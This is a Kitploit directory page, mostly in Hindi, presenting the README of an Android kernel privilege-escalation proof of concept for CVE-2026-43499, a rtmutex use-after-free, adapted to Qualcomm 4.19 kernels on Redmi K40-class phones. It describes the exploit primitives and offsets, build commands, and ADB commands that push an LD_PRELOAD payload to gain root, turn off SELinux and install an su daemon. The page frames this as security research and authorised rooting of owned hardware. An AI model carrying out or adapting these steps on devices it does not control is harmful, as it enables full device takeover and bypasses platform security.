Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ghostlock-cve-2026-43499-4.19-k40 — Android kernel LPE PoC CVE-2026-43499 के लिए, 4.19 Qualcomm kernels में rtmutex use-after-free, Redmi K40 के लिए LD_PRELOAD root payload के साथ अनुकूलित। | Kitploit
उपकरण/GitHubGitHub/ccp-p/ghostlock-cve-2026-43499-4.19-k40
एंड्रॉइड सुरक्षाविशेषाधिकार वृद्धिमेमोरी फोरेंसिकभेद्यता विश्लेषणशोषणपोस्ट-शोषणमोबाइल सुरक्षापेलोड डेवलपमेंटबाइनरी शोषण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubccp-p/ghostlock-cve-2026-43499-4.19-k40

ghostlock-cve-2026-43499-4.19-k40

Android kernel LPE PoC CVE-2026-43499 के लिए, 4.19 Qualcomm kernels में rtmutex use-after-free, Redmi K40 के लिए LD_PRELOAD root payload के साथ अनुकूलित।

रिपॉजिटरी देखें
13घं 7मि पहलेअभी तक समीक्षित नहीं

GhostLock — CVE-2026-43499 PoC (Qualcomm 4.19 kernel)

स्थानीय विशेषाधिकार वृद्धि जो CVE-2026-43499 का शोषण करती है — एक rtmutex remove_waiter() बग जो waiter के kernel स्टैक पर एक struct rt_mutex_waiter को dangling छोड़ देता है (kernel/locking/rtmutex.c, CWE-416 use-after-free)। NebuSec/CyberMeowfia (IonStack/CVE-2026-43499, Apache-2.0) से एक Qualcomm Android 4.19.x vendor kernel परिवार के लिए अनुकूलित।

  • Kernel: 4.19.157-perf-g9607d8651312 (qcom, clang 10.0.7, SMP PREEMPT, aarch64)
  • Device class: Snapdragon 870 (sm8250-ac) / Redmi K40-class बोर्ड, Android 13-era बिल्ड जिनमें boot header v3 है
  • बग: futex_requeue() proxy-lock rollback remove_waiter() को कॉल करता है जो waiter->task के बजाय current पर कार्य करता है — pi_lock के बिना rb-tree dequeue, dangling pi_blocked_on, जिससे kernel-stack UAF होता है। 5.10/5.15/6.1/6.6/6.12/6.18/7.0 fixed संस्करणों तक प्रभावित; 4.19 का कोई backport नहीं है (EOL), इसलिए 4.19.157-perf प्रभावित है।

रेपो में क्या है

root@kitploit:~
src/                         अनुकूलित exploit स्रोत (preload.so)
src/targets/oplus-4.19.157-perf/target.h   प्रति-डिवाइस offset तालिका (kallsyms-व्युत्पन्न)
prebuilt/                    संकलित artifacts (aarch64)
adaptation-4.19.patch        upstream Pixel (6.x) कोड के विरुद्ध पूर्ण diff
Makefile, build.sh           build प्रवेश बिंदु

4.19 kernel के लिए Round-2 अनुकूलन (6.x upstream की तुलना में)

  • configfs_read_file / configfs_write_bin_file को .read/.write fops स्लॉट (4.19 हस्ताक्षर) पर रखा गया है, और read primitive सरलीकृत count/page/ppos=0 fake-buffer लेआउट का उपयोग करता है
  • ashmem नाम उपसर्ग (/dev/ashmem) इस kernel पर अनुपस्थित है — उपसर्ग लंबाई 0
  • kmalloc geometry: 4.19 में 3 cache प्रकार हैं (NORMAL/RECLAIM/DMA, प्रति-memcg caches नहीं); legacy pipe 16-slot buffer array kmalloc-1024 में आता है
  • selinux_blob_sizes 4.19 पर मौजूद नहीं है → सीधा cred->security (SELINUX_CRED_BLOB_OFF=0); struct seccomp में filter_count नहीं है
  • ASHMEM_MISC_FOPS = miscdevice.fops स्लॉट (ashmem_misc + 0x10)

Build

Android NDK के साथ Linux / WSL:

root@kitploit:~
export NDK_ROOT=/path/to/android-ndk-r27c
./build.sh                      # or: make PROJECT=oplus-4.19.157-perf

आउटपुट: prebuilt/preload.so (LD_PRELOAD payload) और एक embedded su_daemon PIE।

ADB उपयोग (one-shot root)

एक ADB shell की आवश्यकता है (एक सामान्य, unprivileged adb shell पर्याप्त है — exploit पूरी तरह unprivileged चलता है और स्वयं को escalate करता है)।

root@kitploit:~
# 1. push the payload
adb push prebuilt/preload.so /data/local/tmp/

# 2. run the exploit against any command (here: id) via LD_PRELOAD
adb shell LD_PRELOAD=/data/local/tmp/preload.so id

# expected on success: uid=0(root) gid=0(root) groups=...
# on failure the process exits 1 and the log below tells you where it stopped.

वैकल्पिक one-liner वेरिएंट:

root@kitploit:~
# capture the exit status too
adb shell "LD_PRELOAD=/data/local/tmp/preload.so id; echo rc=\$?"

# interactive root shell (the exploit also installs an su daemon)
adb shell "LD_PRELOAD=/data/local/tmp/preload.so /system/bin/sh -c 'su -c id'"

Debug log (panic/reboot के बाद भी सुरक्षित)

प्रत्येक pr_* पंक्ति तत्काल write()+fsync() के साथ डिस्क पर mirror की जाती है ताकि trail kernel panic/reboot के बाद भी बचा रहे:

root@kitploit:~
/sdcard/Download/log_<timestamp>.txt

यदि /sdcard उपलब्ध न हो तो fallback पथ: /sdcard/Downloads, /data/local/tmp/log_<timestamp>.txt.

root@kitploit:~
# after the run (even after a reboot):
adb shell "ls -t /sdcard/Download/log_*.txt | head -1"
adb shell "cat $(adb shell 'ls -t /sdcard/Download/log_*.txt | head -1' | tr -d '\r')"

मुख्य log मार्कर:

  • preload starting pid=... log=/sdcard/Download/log_<ts>.txt — payload लोड हुआ
  • slide-kaslr-ok ... base=... — KASLR base प्राप्त हुआ
  • pipe-physrw-summary ... root=1 ... — phys RW स्थापित
  • uid_before=... uid_after=0 ... selinux=1->0 — creds पैच किए गए
  • 4.19 पर slide gadget अपने पहले प्रयास से पहले UNVERIFIED प्रिंट करता है — यही चरण है जिसे इस log का उपयोग करके प्रति-डिवाइस ट्यून करना है।

नोट्स और सीमाएँ

  • पहला चरण (KASLR slide leak) प्रति-डिवाइस ट्यून किया जाता है; 4.19 के लिए स्थिर रूप से व्युत्पन्न न हो सकने वाले मान target.h में चिह्नित हैं और रनटाइम पर UNVERIFIED के रूप में लॉग किए जाते हैं। fsync log का उपयोग करके डिवाइस पर पुनरावृत्ति करें।
  • इस बिल्ड पर CONFIG_STATIC_USERMODEHELPER=y modprobe-path तरकीबों को अक्षम करता है; प्राथमिक पथ सीधा cred पैचिंग है।
  • तैनाती से पहले अपने सटीक बिल्ड पर offset की शुद्धता kernel के स्वयं के kallsyms (/proc/kallsyms) और /proc/slabinfo के माध्यम से सत्यापित करें।

लाइसेंस

Apache-2.0 (upstream: NebuSec/CyberMeowfia)। केवल सुरक्षा अनुसंधान और अधिकृत डिवाइस रूटिंग के लिए। अपने स्वामित्व वाले हार्डवेयर पर उपयोग करें।

टूल डाउनलोड करें
  • struct offsets (task_struct / cred / pipe_inode_info / file_operations / mm_struct / struct page / configfs_buffer) इस kernel के kallsyms + embedded ikheaders से पुनः व्युत्पन्न किए गए और kernel की स्वयं की RELA relocation तालिका के विरुद्ध सत्यापित किए गए